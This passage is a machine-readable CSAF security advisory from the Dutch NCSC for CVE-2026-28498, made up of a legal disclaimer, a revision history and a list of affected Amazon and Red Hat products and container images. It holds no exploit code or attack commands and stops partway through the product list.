{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-28498",
        "tracking": {
            "current_release_date": "2026-04-03T00:35:43.616119Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-28498",
            "initial_release_date": "2026-03-16T16:43:01.489434Z",
            "revision_history": [
                {
                    "date": "2026-03-16T16:43:01.489434Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-16T16:43:04.728346Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-16T18:28:22.148921Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-16T18:28:23.931952Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-16T18:38:42.019486Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1).| Unknown change."
                },
                {
                    "date": "2026-03-16T18:38:43.462135Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-16T22:50:58.698921Z",
                    "number": "7",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-17T00:27:42.119519Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (30).| Product Identifiers created (5).| References created (5).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-17T00:27:48.240842Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T00:44:05.664252Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Products connected (2)."
                },
                {
                    "date": "2026-03-17T00:44:14.722759Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T06:43:42.190904Z",
                    "number": "12",
                    "summary": "Description created for source."
                },
                {
                    "date": "2026-03-17T07:35:17.587694Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T15:03:34.388556Z",
                    "number": "14",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-17T15:03:37.510865Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T21:28:30.926984Z",
                    "number": "16",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-17T21:28:33.062172Z",
                    "number": "17",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T15:28:26.119795Z",
                    "number": "18",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T15:28:36.081240Z",
                    "number": "19",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:36:55.828201Z",
                    "number": "20",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:36:59.343604Z",
                    "number": "21",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T06:56:19.905961Z",
                    "number": "22",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products connected (1)."
                },
                {
                    "date": "2026-04-01T06:56:23.369903Z",
                    "number": "23",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T11:28:51.171131Z",
                    "number": "24",
                    "summary": "Source connected.| CVE status created. (valid)| Products connected (2).| References created (4)."
                },
                {
                    "date": "2026-04-01T11:28:53.417660Z",
                    "number": "25",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T12:35:46.290026Z",
                    "number": "26",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (29).| Product Remediations created (2).| Product Identifiers created (104).| Product Identifiers removed (104).| References created (21).| CWES updated (1)."
                },
                {
                    "date": "2026-04-01T12:36:06.505043Z",
                    "number": "27",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-02T09:05:47.020663Z",
                    "number": "28",
                    "summary": "Products connected (3).| References created (4)."
                },
                {
                    "date": "2026-04-02T09:05:52.640338Z",
                    "number": "29",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-02T12:28:47.098421Z",
                    "number": "30",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (28).| Product Remediations created (2).| Product Identifiers created (100).| Product Identifiers removed (100).| References created (21).| CWES updated (1)."
                },
                {
                    "date": "2026-04-02T12:29:04.751568Z",
                    "number": "31",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-03T00:34:28.594879Z",
                    "number": "32",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (2).| Product Identifiers created (19).| Product Identifiers removed (19).| References created (22).| CWES updated (1)."
                },
                {
                    "date": "2026-04-03T00:34:32.950237Z",
                    "number": "33",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "33"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/unknown",
                                "product": {
                                    "name": "vers:unknown/unknown",
                                    "product_id": "CSAFPID-1330296",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:amazon:linux_2:-"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Amazon Linux 2"
                    }
                ],
                "category": "vendor",
                "name": "Amazon"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.5",
                                "product": {
                                    "name": "vers:unknown/<2.5",
                                    "product_id": "CSAFPID-1384077"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.6",
                                "product": {
                                    "name": "vers:unknown/<2.6",
                                    "product_id": "CSAFPID-5354794"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Ansible Automation Platform"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-5474797",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:lightspeed_core"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Lightspeed Core"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/2.6",
                                        "product": {
                                            "name": "vers:rpm/2.6",
                                            "product_id": "CSAFPID-5153949",
                                            "product_identification_helper": {
                                                "cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "Red Hat Ansible Automation Platform 2.6"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774139204",
                                        "product": {
                                            "name": "vers:oci/1774139204",
                                            "product_id": "CSAFPID-5973066",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ae43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774139204"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "aap-must-gather-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774153089",
                                        "product": {
                                            "name": "vers:oci/1774153089",
                                            "product_id": "CSAFPID-5973067",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/ansible-builder-rhel9@sha256%3Adb8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774153089"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ansible-builder-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774585183",
                                        "product": {
                                            "name": "vers:oci/1774585183",
                                            "product_id": "CSAFPID-5973068",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774585183"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ansible-dev-tools-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774368903",
                                        "product": {
                                            "name": "vers:oci/1774368903",
                                            "product_id": "CSAFPID-5973070",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/controller-rhel9@sha256%3Aa490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774368903"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "controller-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774484033",
                                        "product": {
                                            "name": "vers:oci/1774484033",
                                            "product_id": "CSAFPID-5973069",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/controller-rhel9-operator@sha256%3Aee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484033"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "controller-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774487884",
                                        "product": {
                                            "name": "vers:oci/1774487884",
                                            "product_id": "CSAFPID-5973071",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/de-minimal-rhel9@sha256%3Ac67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774487884"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "de-minimal-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774490244",
                                        "product": {
                                            "name": "vers:oci/1774490244",
                                            "product_id": "CSAFPID-5973072",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/de-supported-rhel9@sha256%3Afa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774490244"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "de-supported-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774258433",
                                        "product": {
                                            "name": "vers:oci/1774258433",
                                            "product_id": "CSAFPID-5973074",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/eda-controller-rhel9@sha256%3Af720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774258433"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "eda-controller-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774484073",
                                        "product": {
                                            "name": "vers:oci/1774484073",
                                            "product_id": "CSAFPID-5973073",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Afe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484073"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "eda-controller-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774484106",
                                        "product": {
                                            "name": "vers:oci/1774484106",
                                            "product_id": "CSAFPID-5973075",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Af95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484106"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "eda-controller-ui-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774311517",
                                        "product": {
                                            "name": "vers:oci/1774311517",
                                            "product_id": "CSAFPID-5973076",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/ee-minimal-rhel9@sha256%3Ab77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774311517"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ee-minimal-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774321273",
                                        "product": {
                                            "name": "vers:oci/1774321273",
                                            "product_id": "CSAFPID-5973077",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/ee-supported-rhel9@sha256%3Ad6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774321273"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ee-supported-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774139334",
                                        "product": {
                                            "name": "vers:oci/1774139334",
                                            "product_id": "CSAFPID-5973078",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774139334"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "gateway-proxy-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774243862",
                                        "product": {
                                            "name": "vers:oci/1774243862",
                                            "product_id": "CSAFPID-5973080",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/gateway-rhel9@sha256%3Aed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774243862"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "gateway-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774484129",
                                        "product": {
                                            "name": "vers:oci/1774484129",
                                            "product_id": "CSAFPID-5973079",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/gateway-rhel9-operator@sha256%3Af0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484129"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "gateway-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774644659",
                                        "product": {
                                            "name": "vers:oci/1774644659",
                                            "product_id": "CSAFPID-5973082",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/hub-rhel9@sha256%3Ad204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774644659"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "hub-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774484154",
                                        "product": {
                                            "name": "vers:oci/1774484154",
                                            "product_id": "CSAFPID-5973081",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/hub-rhel9-operator@sha256%3Aa89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484154"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "hub-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774647780",
                                        "product": {
                                            "name": "vers:oci/1774647780",
                                            "product_id": "CSAFPID-5973083",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/hub-web-rhel9@sha256%3Afad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774647780"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "hub-web-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774417022",
                                        "product": {
                                            "name": "vers:oci/1774417022",
                                            "product_id": "CSAFPID-5973065",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Ad17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774417022"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-chatbot-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774363040",
                                        "product": {
                                            "name": "vers:oci/1774363040",
                                            "product_id": "CSAFPID-5973085",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/lightspeed-rhel9@sha256%3Adb0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774363040"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774484113",
                                        "product": {
                                            "name": "vers:oci/1774484113",
                                            "product_id": "CSAFPID-5973084",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Accf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484113"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774268173",
                                        "product": {
                                            "name": "vers:oci/1774268173",
                                            "product_id": "CSAFPID-5973090",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/mcp-server-rhel9@sha256%3A6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-tech-preview&tag=1774268173"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "mcp-server-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774268174",
                                        "product": {
                                            "name": "vers:oci/1774268174",
                                            "product_id": "CSAFPID-5973086",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/mcp-tools-rhel9@sha256%3A7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774268174"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "mcp-tools-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774540248",
                                        "product": {
                                            "name": "vers:oci/1774540248",
                                            "product_id": "CSAFPID-5984227",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/metrics-service-rhel9@sha256%3Ac8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-tech-preview&tag=1774540248"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "metrics-service-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774648896",
                                        "product": {
                                            "name": "vers:oci/1774648896",
                                            "product_id": "CSAFPID-5973091",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/platform-operator-bundle@sha256%3A79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform&tag=1774648896"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774648925",
                                        "product": {
                                            "name": "vers:oci/1774648925",
                                            "product_id": "CSAFPID-5973092",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/platform-operator-bundle@sha256%3Af27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform&tag=1774648925"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "platform-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774484549",
                                        "product": {
                                            "name": "vers:oci/1774484549",
                                            "product_id": "CSAFPID-5973087",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Abc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484549"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "platform-resource-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774485790",
                                        "product": {
                                            "name": "vers:oci/1774485790",
                                            "product_id": "CSAFPID-5973088",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Af0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774485790"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "platform-resource-runner-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774573035",
                                        "product": {
                                            "name": "vers:oci/1774573035",
                                            "product_id": "CSAFPID-5973089",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/receptor-rhel9@sha256%3Af00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774573035"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "receptor-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/unknown",
                                "product": {
                                    "name": "vers:unknown/unknown",
                                    "product_id": "CSAFPID-1317175",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:5::server"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-1439279",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_ai"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441200",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:quay:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Quay 3"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/3.16",
                                        "product": {
                                            "name": "vers:rpm/3.16",
                                            "product_id": "CSAFPID-5278082",
                                            "product_identification_helper": {
                                                "cpe": "cpe:/a:redhat:quay:3.16::el9"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "Red Hat Quay 3.16"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773785566",
                                        "product": {
                                            "name": "vers:oci/1773785566",
                                            "product_id": "CSAFPID-5986174",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/clair-rhel9@sha256%3Abbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1773785566"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "clair-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773785412",
                                        "product": {
                                            "name": "vers:oci/1773785412",
                                            "product_id": "CSAFPID-5986175",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773785412"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-bridge-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773784980",
                                        "product": {
                                            "name": "vers:oci/1773784980",
                                            "product_id": "CSAFPID-5986176",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773784980"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-bridge-operator-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773781267",
                                        "product": {
                                            "name": "vers:oci/1773781267",
                                            "product_id": "CSAFPID-5986177",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773781267"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-builder-qemu-rhcos-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773785008",
                                        "product": {
                                            "name": "vers:oci/1773785008",
                                            "product_id": "CSAFPID-5986178",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-builder-rhel9@sha256%3Ab97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773785008"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-builder-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773785431",
                                        "product": {
                                            "name": "vers:oci/1773785431",
                                            "product_id": "CSAFPID-5986179",
                                            "product_identification_helper": {
